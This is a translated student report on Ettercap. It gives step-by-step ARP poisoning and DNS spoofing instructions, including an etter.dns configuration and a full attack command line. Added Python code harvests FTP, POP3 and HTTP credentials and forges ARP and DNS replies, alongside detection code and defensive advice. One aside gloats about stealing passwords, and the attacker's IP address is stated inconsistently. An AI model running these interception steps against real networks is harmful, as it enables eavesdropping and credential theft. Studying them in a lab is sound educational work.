BTQLMang_Ettercap_

Transcript of BTQLMang_Ettercap_ (21 pages, printed 8/3/2019)

Network management software (QLM) Ettercap, Group 2, H09VT9

AN INTRODUCTION TO THE NETWORK MANAGEMENT SOFTWARE ETTERCAP

PREFACE

It can be said that no field of computer science today is more important than networking. A computer network is two or more computers connected in some way so that they can exchange information with one another and share data, instead of passing it around by printing it or copying it onto floppy disks or CD-ROMs.

Computer network infrastructure is therefore an indispensable part of any organisation or company. In today's economic conditions, most organisations and companies whose premises are limited in area and floor space deploy a LAN so that managing the organisation's internal data is convenient and so that data safety and data confidentiality are ensured. A LAN also lets the staff of the organisation or company access data conveniently and at high speed. A further advantage is that a LAN lets the network administrator assign rights to resources for each user clearly and conveniently, which helps those who lead the company manage staff and run the company easily. At the same time, the network administrator must also have methods that put data security first and fend off attacks by hackers. To do this, one needs to explore, study and test some software tools that support network management. Our Group 2 set out to study and test the network management software Ettercap for Windows XP. With knowledge as incomplete as ours, studying and testing it was itself a difficult problem. Because knowledge and time are limited, this report cannot avoid certain mistakes. We very much hope to receive comments and discussion from our teachers and classmates so that the report can be made more complete.

Sincerely, thank you!

Hanoi, 20 June 2011

Prepared by

Group 2


1. GENERAL OVERVIEW OF THE SOFTWARE

1.1 General information

Ettercap is a suite for man-in-the-middle attacks on a LAN. It can sniff live connections, filter content on the fly and perform many other tricks. It supports active and passive dissection of many protocols (including encrypted ones, for which it has to insert itself into the handshake, for instance by presenting its own certificate to an SSL client) and includes many features for network and host analysis.

1.2 Purpose

- With Ettercap you can monitor the traffic on your network, capture data, display and intervene in connections, and watch which hosts are talking on the network.

- It supports Address Resolution Protocol (ARP) spoofing, also called ARP poisoning or ARP Poison Routing (APR), and sometimes loosely called ARP flooding. This is an attack launched from one computer inside the LAN which, through ARP and the IP-to-MAC address mapping, can cut one or more computers off from the modem or gateway so that they can no longer reach the Internet, or, as used in this report, redirect their traffic through the attacker.

- It is also used for another kind of MITM attack, DNS spoofing.

1.3 Main features

o SSH1 support: you can capture the username and password, and even the data, of an SSH1 connection.

o HTTPS support: you can sniff HTTP data protected by SSL, even when the connection goes through a proxy. (This works by Ettercap presenting its own certificate, so it depends on the client accepting a certificate that is not the server's.)

o Remote traffic through a GRE tunnel: you can sniff remote traffic through a GRE tunnel from a Cisco router and perform MITM attacks on it.

o PPTP broker: you can perform man-in-the-middle attacks against PPTP tunnels.

o Password collectors for: TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, Quake 3, MSN, YMSG.

o Packet filtering/dropping: you can set up a filter that searches for a string (even hex) in the TCP or UDP payload and replaces it with your own, or drops the whole packet.

o OS fingerprinting: you can fingerprint the operating system of the victim host and even its network adapter.

o Kill a connection: from the connection list you can kill any connection you want.

o Passive scanning of the LAN: you can collect information about the hosts in the LAN, their open ports, service versions, the type of host (gateway, router or simple host) and the estimated distance in hops.

o Check for other poisoners: Ettercap can actively or passively find other poisoners on the LAN.

2. ANALYSIS OF SOME CHARACTERISTICS OF ETTERCAP

2.1 The Ettercap interface on Windows XP

Ettercap can run in text mode from a console and with a graphical interface on Windows and Linux. Below I describe Ettercap installed on Windows XP. The figure below shows the program's interface while it is watching the computers in the same LAN:

[Figure: Ettercap main window while monitoring the LAN]

Ettercap works as a network sniffer/interceptor/logger on the LAN. The tool supports many protocols. It can be used at several levels to sniff effectively, and many plugins are available. It works on switched LANs and can fingerprint operating systems (guess the OS of the hosts that are online on the network).


What is a sniffer?

- It is a form of eavesdropping on a network, relying on the way TCP/IP works.

- Sniffing is a security technique developed to help network administrators run their network more effectively and inspect the data entering and leaving it. Its functions:

+ Collect the packets on the system.

+ Help the administrator check the health of the system, errors, or strange packets.

From the screenshot above we can see that important information and private files can be stolen quite easily. To guard against this, username and password authentication should not be carried out in plain text (unencrypted); it should be protected with IPsec or SSL.

Ettercap is a powerful sniffer: it captures the traffic of weakly protected protocols in the clear. Insecure protocols (FTP, telnet, SMB) should therefore be replaced with safer ones, or wrapped in additional protection (SSL, VPN + IPsec).
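To make concrete what "capturing insecure protocols in the clear" means, here is an added example (written for this page, not code from the report or from Ettercap) of the kind of dissector a password sniffer runs over reassembled client-to-server payloads. The FTP, POP3 and HTTP Basic streams are constructed sample data; the port numbers used to pick a dissector and the credential strings are assumptions for the demonstration.

```python
"""What a password sniffer recovers from cleartext protocols: dissectors for
FTP, POP3 and HTTP Basic run over constructed client-to-server payloads.
Standard library only. Moving these services to FTPS/SFTP, POP3S and HTTPS
is what takes the credentials out of the sniffer's reach."""
import base64
import re

# Constructed client->server payloads, as they would look after TCP reassembly.
FTP_STREAM = b"USER alice\r\nPASS s3cret!\r\nSYST\r\n"
POP3_STREAM = b"USER bob@example.com\r\nPASS hunter2\r\nSTAT\r\n"
HTTP_STREAM = (b"GET /admin HTTP/1.1\r\nHost: intranet.local\r\n"
               b"Authorization: Basic " + base64.b64encode(b"carol:Passw0rd")
               + b"\r\n\r\n")

# FTP and POP3 both send USER on one line and PASS on a later line.
USER_PASS_RE = re.compile(rb"^USER\s+(\S+)\r?$.*?^PASS\s+(\S+)\r?$", re.S | re.M)
BASIC_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\r?$", re.M)


def dissect_user_pass(proto, stream):
    """Pair each USER line with the PASS line that follows it."""
    return [(proto, u.decode(), p.decode()) for u, p in USER_PASS_RE.findall(stream)]


def dissect_http_basic(stream):
    """HTTP Basic auth is only base64("user:password"), not encryption."""
    creds = []
    for m in BASIC_RE.finditer(stream):
        try:
            user, _, pw = base64.b64decode(m.group(1), validate=True).partition(b":")
        except ValueError:
            continue  # malformed header, nothing to harvest
        creds.append(("HTTP", user.decode(errors="replace"), pw.decode(errors="replace")))
    return creds


def dissect(dst_port, stream):
    """Choose a dissector by destination port (assumed standard ports)."""
    if dst_port == 21:
        return dissect_user_pass("FTP", stream)
    if dst_port == 110:
        return dissect_user_pass("POP3", stream)
    if dst_port == 80:
        return dissect_http_basic(stream)
    return []  # e.g. 443: TLS, nothing readable here


def harvest(flows):
    """flows: iterable of (dst_port, payload). Returns (proto, user, password) tuples."""
    found = []
    for port, stream in flows:
        found.extend(dissect(port, stream))
    return found


if __name__ == "__main__":
    flows = [(21, FTP_STREAM), (110, POP3_STREAM), (80, HTTP_STREAM)]
    for proto, user, pw in harvest(flows):
        print(f"{proto}: {user} / {pw}")
```

Each dissector is a few lines because these protocols make no attempt to hide the secret; the same TLS-wrapped services yield nothing to `dissect`, which is the whole argument for switching.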

Network model using Ettercap

Ettercap's sniffer works even on a switched LAN, which is otherwise regarded as effective and safe against eavesdropping (the program is nicknamed "Lord of the Token Ring"). Ettercap impersonates the MAC address of the attacked computer's network card: instead of a packet travelling straight to its destination, it is first delivered to the computer running Ettercap and only then forwarded to the real destination. This is a very dangerous form of attack called Man In The Middle (MITM). The session between sender and receiver still proceeds normally, so the user has no idea that they are under attack, much like the wiretaps we see in films. Programs of this kind are commonly called sniffers.

[Figure: Ettercap's two sniffing modes. Unified: one network card. Bridged: network card 1 and network card 2.]

Ettercap has a powerful password sniffer and can find and display passwords in the following protocols: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, LDAP, VNC, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG.

Darn, that is a LOT of protocols I can steal passwords from!

DNS hijacking and spoofing

Ettercap can intercept DNS requests, check them against its own configuration, and answer them with a bogus IP address.

The forged reply arrives before the real reply can reach its target, so the victim's resolver takes the forged one and ignores the real one.

This can be done easily in "unified" mode; no bridge is needed.

[Figure, two diagrams: Victim Computer, Ettercap, The Interwebz; the DNS request and the forged reply passing through Ettercap]


Ettercap's plug-ins

You can use Ettercap itself to detect Ettercap and other sniffers on the network, fighting fire with fire. Ettercap has two very useful plug-ins: one looks for other computers running Ettercap on the network, and the other detects other suspicious sniffing programs. For example, if you suspect somebody is eavesdropping on the network, start Ettercap and press P, then choose the first plug-in, which finds the hosts running Ettercap. When the other side uses a different tool such as dsniff, you can detect it with plug-in 15, arpcop: a new window lists the hosts that are running ARP spoofing programs on the network. (These names and key bindings are from the old Ettercap 0.6 series; in Ettercap NG the equivalents are find_ettercap, search_promisc and arp_cop, chosen from Plugins/Manage the plugins.)

Once the culprit is identified, you can isolate that computer from the network immediately by pressing P, choosing the plug-in named leech, selecting Yes and pressing Enter (isolate in Ettercap NG). Some system administrators also use Ettercap to find virus-infected machines that are spreading on the network, cut them off with leech, and then clean them with antivirus software, which is very effective.


2.2 Test setup

- Three computers:

  - Attacker computer C: IP 192.168.15.3; MAC 00:18:9A:8E:3F:DE

  - Computer A: IP 192.168.15.1; MAC 00:17:9A:8E:2F:DE

  - Victim computer B: IP 192.168.15.2; MAC 00:16:36:2E:D2:2E

- One switch connecting the three computers.

- Ettercap installed on the attacker computer C.

The ARP spoofing steps are carried out on computer C (the attacker).

[Figure: computers A, B and C (Attacker, Victim) connected to the switch]


Attacker computer C wants to carry out an ARP attack against victim computer B. The attacker wants to capture and read every packet that computer A sends to victim B. How can the attacker achieve this?

First, when computer A wants to send data to the victim, it needs B's MAC address in order to communicate. A therefore broadcasts an ARP Request to every computer in the LAN asking which MAC address belongs to IP 192.168.15.2 (the victim's IP).

- Both attacker C and victim B receive the ARP Request, but only victim B sends an ARP Reply back to host A. The ARP Reply contains victim B's IP, victim B's MAC and computer A's MAC.

After receiving the ARP Reply from the victim, computer A knows victim B's MAC address and begins communicating and sending data to the victim. Attacker C cannot see the contents of the data exchanged between the two computers (A and victim B), because the switch delivers frames only to the port on which it learned B's MAC.

Steps in the Ettercap GUI:

1. Open Ettercap in graphical mode: #ettercap -G

2. Choose the sniffing mode: Sniff/Unified sniffing

3. Scan for hosts: Hosts/Scan for hosts

4. View the MAC and IP addresses of the hosts on the network: Hosts/Hosts list

5. Two hosts are shown: computer A: IP 192.168.15.1, MAC 00:17:9A:8E:2F:DE; computer B: IP 192.168.15.2, MAC 00:16:36:2E:D2:2E

6. Choose computer B to poison: select the row containing 192.168.15.2 and press the Add to Target 1 button

7. Check the targets: Targets/Current Targets

8. Start ARP poisoning: Mitm/Arp poisoning

9. Start sniffing: Start/Start sniffing


Attacker C wants to see the data passing between computer A and victim B, so it uses ARP spoofing. Attacker C continuously sends ARP Replies containing the victim's IP, attacker C's MAC and computer A's MAC: in place of victim B's MAC, the attacker substitutes its own.

Computer A receives the ARP Reply and concludes that the victim IP 192.168.15.2 has MAC address 00:18:9A:8E:3F:DE (attacker C's MAC). A stores this in its ARP cache.

From now on, everything A sends to 192.168.15.2 (the victim) is received by the attacker, who can read the entire content A sends to victim B.

Attacker C can also take control of the whole conversation between A and victim B through the ARP attack. Attacker C keeps sending ARP Replies carrying the IP addresses of computer A and of victim B, but with attacker C's MAC address in both.

When A receives these packets it believes that victim B has MAC address 00:18:9A:8E:3F:DE (attacker C's MAC).

When the victim receives them it believes that computer A has MAC address 00:18:9A:8E:3F:DE (the attacker's MAC).

Every message exchanged between A and victim B now passes through attacker C, so attacker C can read the whole conversation between A and victim B. (Ettercap also forwards each frame on to its real destination, which is why the two hosts keep communicating normally and notice nothing.)
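The exchange described above, as an added example (not from the report or from Ettercap): it builds real Ethernet/ARP frames with the lab's addresses, models the ARP caches of A and B, runs the normal request/reply, and then delivers the two forged replies that attacker C sends. The Host class is a deliberately minimal model of an ARP cache that takes unsolicited replies at face value, as Windows XP did; real stacks differ in exactly when they accept such replies, which is an assumption of this model rather than a statement about any particular OS.

```python
"""ARP request/reply and the poisoned version, with the lab's addresses.
Frames are laid out as on the wire (Ethernet II + RFC 826 ARP), stdlib only."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Addresses from the test setup (A, victim B, attacker C running Ettercap).
A_IP, A_MAC = "192.168.15.1", "00:17:9a:8e:2f:de"
B_IP, B_MAC = "192.168.15.2", "00:16:36:2e:d2:2e"
C_IP, C_MAC = "192.168.15.3", "00:18:9a:8e:3f:de"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """One Ethernet frame carrying one ARP packet; requests are broadcast."""
    dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = mac_bytes(dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)      # Ethernet, IPv4, 6, 4, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) or None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return op, mac(frame[22:28]), ip(frame[28:32]), mac(frame[32:38]), ip(frame[38:42])


class Host:
    """Minimal ARP behaviour: answer requests for its own IP, and cache whatever
    a reply addressed to it claims. ARP has no authentication, so the cache
    cannot tell B's genuine reply from C's forged one."""

    def __init__(self, ip, mac):
        self.ip, self.mac, self.cache = ip, mac, {}

    def receive(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, smac, sip, _tmac, tip = parsed
        if op == ARP_REQUEST and tip == self.ip:
            return build_arp(ARP_REPLY, self.mac, self.ip, smac, sip)
        if op == ARP_REPLY and tip == self.ip:
            self.cache[sip] = smac      # assumption: unsolicited replies are accepted
        return None


def run_scenario():
    """Returns (A's cache after normal ARP, A's cache after poisoning, B's cache after poisoning)."""
    a, b = Host(A_IP, A_MAC), Host(B_IP, B_MAC)
    # 1. Normal resolution: A broadcasts, only B answers, A learns B's real MAC.
    request = build_arp(ARP_REQUEST, A_MAC, A_IP, "00:00:00:00:00:00", B_IP)
    a.receive(b.receive(request))
    before = dict(a.cache)
    # 2. Attacker C forges replies: "B is at C_MAC" to A, "A is at C_MAC" to B.
    #    Ettercap's ARP poisoning MITM sends exactly these, and keeps resending them.
    a.receive(build_arp(ARP_REPLY, C_MAC, B_IP, A_MAC, A_IP))
    b.receive(build_arp(ARP_REPLY, C_MAC, A_IP, B_MAC, B_IP))
    return before, dict(a.cache), dict(b.cache)


if __name__ == "__main__":
    before, a_after, b_after = run_scenario()
    print("A before:", before)
    print("A after :", a_after)
    print("B after :", b_after)
```

The forged frames differ from genuine ones only in the sender hardware address field, which is why the same parser and the same cache logic accept both; the protocol has no field the receiver could check.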

2.3 Installation and test run

(tested on two PCs)

After installing Ettercap, the screen looks like this:

[Figure: Ettercap main window after installation]


On the toolbar, choose Sniff/Unified sniffing.

A dialog box appears asking for input:

[Figure: the Unified sniffing dialog]


In the Network interface field, enter eth0.

The toolbar now shows more functions. Choose Targets/Current Targets. Here you can see how many computers are in the LAN (based on the address range shown in detail below).


The interface shows Target 1 and Target 2. On the toolbar choose Hosts/Hosts list; the screen shows the parameters of the two computers:

IP address / MAC address

The Attacker machine is the hacker's machine; the Victim machine is the one being attacked.

Here IP 192.168.15.1 is the Attacker and IP 192.168.15.2 is the Victim.

Click on the Victim's address and press Add to Target 1; click on the hacker's address and press Add to Target 2. (Ettercap poisons the traffic between the two target groups, so in a real interception Target 2 would be the gateway or the other host the victim talks to, not the attacking machine itself.)


Go to Mitm/ARP poisoning. In the dialog, tick Sniff remote connections and press OK.


The lower pane of the program lists the groups; press Start sniffing.

Then choose Plugins/Manage the plugins.


The Plugins tab lists the available plugins.

Double-click repoison_arp.


In a Command Prompt, type arp -a (run on the Victim, this shows which MAC its ARP cache now holds for the other host).

Clicking repoison_arp, the pane below shows the username and password of the Victim machine when it logs in to the website youtube.com.
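The arp -a check above, and the poisoner-detection plug-ins described in the plug-ins section, can be reproduced in a few lines. This is an added example, not the report's or Ettercap's own code: it parses a constructed arp -a dump taken on the victim and flags one MAC answering for several IPs, and it watches a constructed sequence of ARP replies for an IP whose MAC changes, which is the condition arp_cop reports. A MAC legitimately bound to several IPs (a gateway with secondary addresses) would also be flagged, so treat the output as a lead to verify, not as proof.

```python
"""Two victim-side checks for ARP poisoning, standard library only:
 1. parse Windows `arp -a` output and list any MAC that appears for more than
    one IP (the attacker's card answering for both the gateway and a host);
 2. watch a stream of ARP replies and report an IP whose MAC changes."""
import re
from collections import defaultdict

# Constructed `arp -a` output on victim B after the poisoning in the test setup:
# the real host 192.168.15.1 now shares the attacker's MAC (192.168.15.3).
ARP_A_SAMPLE = """
Interface: 192.168.15.2 --- 0xb
  Internet Address      Physical Address      Type
  192.168.15.1          00-18-9a-8e-3f-de     dynamic
  192.168.15.3          00-18-9a-8e-3f-de     dynamic
  192.168.15.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ENTRY_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)", re.I)


def parse_arp_table(text):
    """{ip: mac} for the dynamic entries; static ones are local/multicast noise."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def duplicate_macs(table):
    """{mac: [ips]} for every MAC that is listed for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


class ArpCop:
    """Remember the last MAC seen for each IP and report whenever it changes.
    Repeated identical replies (repoison_arp resending) are not re-reported;
    a flip back to the genuine MAC is, so a poisoned host shows up as flapping."""

    def __init__(self):
        self.seen = {}

    def observe(self, sender_ip, sender_mac):
        sender_mac = sender_mac.lower()
        old = self.seen.get(sender_ip)
        self.seen[sender_ip] = sender_mac
        if old is not None and old != sender_mac:
            return f"ARP change for {sender_ip}: {old} -> {sender_mac}"
        return None


# Constructed ARP replies as (sender_ip, sender_mac), in the order B would see them.
REPLIES = [
    ("192.168.15.1", "00:17:9a:8e:2f:de"),  # genuine reply from A
    ("192.168.15.1", "00:18:9a:8e:3f:de"),  # attacker C claiming A's IP
    ("192.168.15.1", "00:18:9a:8e:3f:de"),  # repoison_arp resends the same claim
    ("192.168.15.1", "00:17:9a:8e:2f:de"),  # A answers a real request again
]


def run_monitor(replies):
    cop = ArpCop()
    return [a for a in (cop.observe(ip, mac) for ip, mac in replies) if a]


if __name__ == "__main__":
    print(duplicate_macs(parse_arp_table(ARP_A_SAMPLE)))
    for alert in run_monitor(REPLIES):
        print(alert)
```

The table check needs nothing but a command prompt on the victim; the monitor needs a capture point that sees ARP traffic, which on a switched LAN means the host being protected or a mirror port.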


III. Practical application on a larger network

DNS spoofing attacks using DNS ID spoofing

Ettercap also has an excellent DNS spoofing feature and can be used to carry out many kinds of MITM attack. It is a tool that runs on both Windows and Linux.

If you install Ettercap on a Windows machine you will find it has quite a nice graphical user interface (GUI); in this example, however, we use the command-line interface.

Before running Ettercap, a little configuration is required. At its core Ettercap is a data sniffer; it uses plug-ins to carry out the various attacks. The dns_spoof plug-in is what we use in this example, so we must edit the configuration file associated with that plug-in. On Windows this file is found at C:\Program Files (x86)\EttercapNG\share\etter.dns, and on Linux at /usr/share/ettercap/etter.dns. It is a fairly simple file containing the DNS records you want to spoof. For this test we want anyone trying to reach yahoo.com to be directed to a host on the internal network, so we add the entries highlighted in Figure 5.


Figure 5: Adding spoofed DNS records to etter.dns

These entries tell the dns_spoof plug-in that when it sees a DNS query for yahoo.com or www.yahoo.com (for a resource record of type A) it should answer with the IP address 172.16.16.100. In a real scenario the device at 172.16.16.100 would run web server software and show the user a spoofed website.

Once the file is configured and saved, we can run the command that launches the attack. The command uses the following options:

-T  Use the text interface.

-q  Run quietly: captured packets are not displayed on screen.

-P dns_spoof  Use the dns_spoof plug-in.

-M arp  Start the ARP spoofing MITM attack to intercept packets between hosts.

// //  Target the whole network.

The final command for our purposes is:

Ettercap.exe -T -q -P dns_spoof -M arp // //

Running this command starts a two-stage attack: first the ARP caches of the devices on the network are poisoned, then forged responses to DNS queries are sent.

Figure 6: Ettercap actively listening for DNS queries

Once it is running, anyone trying to reach www.yahoo.com is redirected to our malicious website.
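The two-stage attack, as an added example (not from the report, the article it follows, or Ettercap): it parses the two etter.dns entries from Figure 5 in the file's own "host TYPE value" format, builds a forged DNS answer that copies the victim's transaction ID and question, and shows with a minimal stub-resolver model why the forged answer wins when the attacker sits in the path (it sees the ID and its reply arrives first) and is ignored when a blind attacker guesses the ID wrong. The transaction ID 0x1a2b and the "genuine" address 203.0.113.10 are placeholders chosen for the demonstration.

```python
"""DNS ID spoofing as the dns_spoof plug-in does it, modelled offline with
the standard library: the forged answer must carry the query's transaction ID
and question, and it wins only if it is accepted before the real answer."""
import struct

# Constructed etter.dns entries, in the file's own format (name, type, value).
ETTER_DNS = """
# redirect yahoo.com to an internal web server
yahoo.com      A   172.16.16.100
www.yahoo.com  A   172.16.16.100
"""


def parse_etter_dns(text):
    """{name: ip} for the A records; comments and blank lines are skipped."""
    records = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rtype, value = line.split()
        if rtype.upper() == "A":
            records[name.lower().rstrip(".")] = value
    return records


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def decode_name(msg, off):
    labels = []
    while msg[off]:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid, name):
    """A standard recursive A query, as a stub resolver sends it."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    name, off = decode_name(msg, 12)
    qtype = struct.unpack("!H", msg[off:off + 2])[0]
    return txid, name, qtype


def forge_response(query, records):
    """Answer only names present in the records; copy ID and question verbatim."""
    txid, name, qtype = parse_query(query)
    ip = records.get(name.lower())
    if ip is None or qtype != 1:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; 1 answer
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 3600, 4) + bytes(int(o) for o in ip.split("."))
    return header + question + answer


def parse_answer_ip(resp):
    _, off = decode_name(resp, 12)
    off += 4          # QTYPE, QCLASS
    off += 2 + 10     # name pointer, TYPE, CLASS, TTL, RDLENGTH
    return ".".join(str(b) for b in resp[off:off + 4])


class StubResolver:
    """Accepts the first response whose transaction ID matches its pending query."""

    def __init__(self, txid, name):
        self.query, self.txid, self.result = build_query(txid, name), txid, None

    def deliver(self, resp):
        if resp is not None and self.result is None and struct.unpack("!H", resp[:2])[0] == self.txid:
            self.result = parse_answer_ip(resp)
        return self.result


def simulate():
    """Returns (result with attacker in the path, result with a blind attacker)."""
    spoof = parse_etter_dns(ETTER_DNS)
    genuine = {"www.yahoo.com": "203.0.113.10"}      # placeholder for the real answer
    # In the path (ARP MITM): attacker sees the query, its reply arrives first.
    victim = StubResolver(0x1a2b, "www.yahoo.com")
    victim.deliver(forge_response(victim.query, spoof))
    victim.deliver(forge_response(victim.query, genuine))   # too late, ignored
    # Blind: attacker never saw the query and guesses ID 1; only the genuine reply counts.
    victim2 = StubResolver(0x1a2b, "www.yahoo.com")
    victim2.deliver(forge_response(build_query(0x0001, "www.yahoo.com"), spoof))
    victim2.deliver(forge_response(victim2.query, genuine))
    return victim.result, victim2.result


if __name__ == "__main__":
    print(simulate())
```

The model makes the dependency explicit: the ARP stage is what gives the attacker the transaction ID and the head start, and without it the same forged packet is discarded. DNSSEC validation, mentioned under the defences, would reject the forged answer even when the ID matches.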


Figure 7: The result of the DNS spoofing attempt from the user's perspective

Defending against DNS spoofing

DNS spoofing is hard to defend against because there are very few signs of the attack. Usually you have no idea your DNS has been spoofed until it has happened: what you get is a completely different website from the one you expected. In a carefully targeted attack you may well not realise you have been tricked into entering sensitive information into a fake website until you receive a call from your bank asking why you have withdrawn so much money.

Although it is difficult, it is not impossible to defend against this kind of attack. Here are some things you should do:

- Protect your internal machines: attacks like the one above are usually launched from inside your network. If your network devices are secure, you reduce the chance that a host will be compromised and used to launch a spoofing attack.

- Do not rely on DNS for security-sensitive systems: on highly sensitive and secure systems, the best practice is not to browse the Internet on them at all, so that DNS is not used. If you have software that uses hostnames to do some of its work, adjust what is needed in the device's configuration file (for example, a hosts file entry that pins the name to the expected address).

- Use an IDS: an intrusion detection system, correctly placed and deployed, can expose ARP cache poisoning and DNS spoofing.

- Use DNSSEC: DNSSEC is a newer alternative to DNS that uses digitally signed DNS records to guarantee the validity of query responses. Although DNSSEC is not yet widely deployed, it is accepted as the future of DNS.

Conclusion


DNS spoofing is a fairly dangerous form of MITM attack when combined with malicious intent. Using it, attackers can exploit spoofing techniques to steal users' sensitive information, install malware from a malicious exploit site, or cause a denial of service.

In the next part of this series we will introduce pass-the-hash attacks and how they can be used to log in to Windows computers without the users' passwords.